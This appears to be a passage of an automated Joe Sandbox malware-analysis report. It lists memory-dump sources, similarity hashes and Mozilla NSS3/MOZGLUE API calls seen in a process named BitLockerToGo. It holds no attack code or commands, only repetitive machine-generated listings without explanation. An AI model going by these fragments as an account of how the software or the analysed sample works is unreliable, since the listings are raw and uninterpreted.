• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Item_UtilZfreefree
• String ID: 4_ml
• API String ID: 2193358613-1773825060
• Opcode ID: 5770f893668c58deb4bacdb4d0db17aebb52c38535f3035e621efe4ff5380b6b
• Instruction ID: 332d4fe4b29b8f52c59acfb22dfc12db7cd6ed4d80d3525a1758fe85f7dde3ca
• Opcode Fuzzy Hash: 5770f893668c58deb4bacdb4d0db17aebb52c38535f3035e621efe4ff5380b6b
• Instruction Fuzzy Hash: AC015EB69011049FCB00CF69DCC4C967BBCEF8A25934584A6E909DB705E731E908CBA9
APIs
• DeleteCriticalSection.KERNEL32(00000000,6C6D1AB6,00000000,?,?,6C6D07B9,?), ref: 6C75C9C6
• free.MOZGLUE(?,?,6C6D07B9,?), ref: 6C75C9D3
• DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6C75C9E5
• free.MOZGLUE(?), ref: 6C75C9EC
• DeleteCriticalSection.KERNEL32(00000080), ref: 6C75C9F8
• free.MOZGLUE(?), ref: 6C75C9FF
• free.MOZGLUE(00000000), ref: 6C75CA0B
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6E3046
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6CEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEE85
                                                                                                                                                                                                                                                                                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C6B7FFB), ref: 6C6E312A
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E3154
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6E2E8B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6CF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C6B9BFF,?,00000000,00000000), ref: 6C6CF134
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6C6B7FFA), ref: 6C6E2EA4
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E317B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6AED6B
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C6AEDCE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6C6AB04F), ref: 6C6AEE46
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6AEECA
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6AEEEA
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6AEEFB
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3768380896-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6ADAE2,?), ref: 6C6AC6C2
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C6ACD35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C696C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C3F
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C6ACD54
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C697260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C641CCC,00000000,00000000,?,?), ref: 6C69729F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6ACD9B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C6ACE0B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C6ACE2C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6ACE40
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaMark_Util.NSS3(?,6C6ACD93,?), ref: 6C6ACEEE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ACD93,?), ref: 6C6ACEFC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ACD93,?), ref: 6C6ACF0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ACD93,?), ref: 6C6ACF1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF47
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF67
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ACD93,?,?,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF78
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 665271630c6100fa2487a392a597597ba21166546de9b7c64832e26af2d5bf94
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 906d190ae766c296882cfab32528b35f875714ea0afd8c538f5325359edeb6e3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 665271630c6100fa2487a392a597597ba21166546de9b7c64832e26af2d5bf94
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351B3B6A00205AFEB10EFA9DC40B9A77E4FF49348F250524D94697741EB32ED07CB99
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C67EF38
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C669520: PK11_IsLoggedIn.NSS3(00000000,?,6C69379E,?,00000001,?), ref: 6C669542
                                                                                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C67EF53
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: TlsGetValue.KERNEL32 ref: 6C684C4C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: EnterCriticalSection.KERNEL32(?), ref: 6C684C60
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CA1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C684CBE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CD2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684D3A
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C67EF9E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C67EFC3
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C67F016
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C67F022
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C654894
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6548CA
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6548DD
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C6548FF
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C654912
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C65494A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 759476665-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000060), ref: 6C66CF80
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C66D002
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C66D016
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C66D025
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C66D043
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C66D074
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3361105336-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C642D1A), ref: 6C652E7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C652EDF
                                                                                                                                                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C652EE9
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C642D1A), ref: 6C652F01
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C642D1A), ref: 6C652F50
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C652F81
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
APIs
• CERT_DecodeAVAValue.NSS3(?,?,6C640A2C), ref: 6C640E0F
• PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C640A2C), ref: 6C640E73
• memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C640A2C), ref: 6C640E85
• PORT_ZAlloc_Util.NSS3(00000001,?,?,6C640A2C), ref: 6C640E90
• free.MOZGLUE(00000000), ref: 6C640EC4
• SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C640A2C), ref: 6C640ED9
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
Similarity
• API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
APIs
• TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658906
• EnterCriticalSection.KERNEL32(?), ref: 6C65891A
• PL_ArenaAllocate.NSS3(?,?), ref: 6C65894A
• calloc.MOZGLUE(00000001,6C66072D,00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658959
• memset.VCRUNTIME140(?,00000000,?), ref: 6C658993
• PR_Unlock.NSS3(?), ref: 6C6589AF
  • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
  • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
  • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
  • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
  • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
  • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
Similarity
• API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C64AEB3
• SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C64AECA
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64AEDD
• PR_SetError.NSS3(FFFFE022,00000000), ref: 6C64AF02
• SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C769500), ref: 6C64AF23
  • Part of subcall function 6C69F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C69F0C8
  • Part of subcall function 6C69F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C69F122
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64AF37
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d61ae97812afc3fb0e1d05dfafb8a3e7e74b2a74c37ccccb6229be5c3c782fff
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 20de1be9a2f0e1e7b65b86d7c764d72a229a75432279595b79cb5eb464abe50e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d61ae97812afc3fb0e1d05dfafb8a3e7e74b2a74c37ccccb6229be5c3c782fff
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F21FBB15092007BE7108E589C41B9A7BA4AF85728F14C325FC649B7D2E731D94587AF
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEE85
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(BD5F5530,?), ref: 6C6CEEAE
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C6CEEC5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C6CEEE3
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C6CEEED
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C6CEF01
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9faed1239fb04f8fae1e715f37a8c803519ce3ce00e758b32f0cd783ad2f8a6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9aae73115de44d75d6e311a92de3546c582f15a345954fe3a99cc3881ec8c3ab
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9faed1239fb04f8fae1e715f37a8c803519ce3ce00e758b32f0cd783ad2f8a6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21D171A002149FCB109F28DC85B9ABBB4EF49398F148179EC199B641E730ED15CBEA
                                                                                                                                                                                                                                                                                                                                                          APIs
